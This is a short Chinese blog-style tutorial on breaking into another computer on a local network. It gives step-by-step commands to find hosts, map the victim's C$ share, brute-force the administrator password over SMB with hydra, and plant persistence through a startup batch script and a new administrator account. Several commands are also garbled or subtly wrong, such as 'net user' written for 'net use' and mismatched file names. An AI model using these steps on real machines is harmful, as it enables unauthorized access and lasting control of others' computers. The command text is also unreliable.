一個簡單的內網滲透

在一個區域網里想要拿下某台計算機怎麼做呢？方法是挺多的，在這裡我就說一種吧。

1. 知道對方的IP，方法有net view命令，然後再ping計算機名。
   

2. 知道IP後用命令net user k: \\ip\c$ 註：這條命令意思是把對方電腦的c盤映射到自己電腦形成一個k盤 。

3. 此時如果對方沒有設置密碼我們就成功在自己電腦有個k盤，如果提示要輸入密碼，我們還可以用工具hydra進行爆破。

4. 在命令里輸入cd hydra 註：表示進入文件夾

5. 輸入命令hydra.exe -l administrator -p pass.text ip smb 註：準備破解管理員密碼，pass.txt是密碼文件夾。

6. 最後拿到管理員密碼。成功映射對方c盤到自己電腦形成k盤。

   Advertisements

7. 弄好后，我們是不是要留個後門，方便下次我們進去呢。

8. 用命令「copy con c:\文件夾名 bat」 註：把這個腳本放到對方開機啟動里。

9. 在對方創建一個賬號，用命令「net user 用戶名 /add」 然後用命令「net localgroup administrators cracer/add」 註：先創建用戶然後把這個賬號提權到有管理員許可權。方便我們下次進去。

朋友們，你們有什麼更好好的方法呢，歡迎來留言。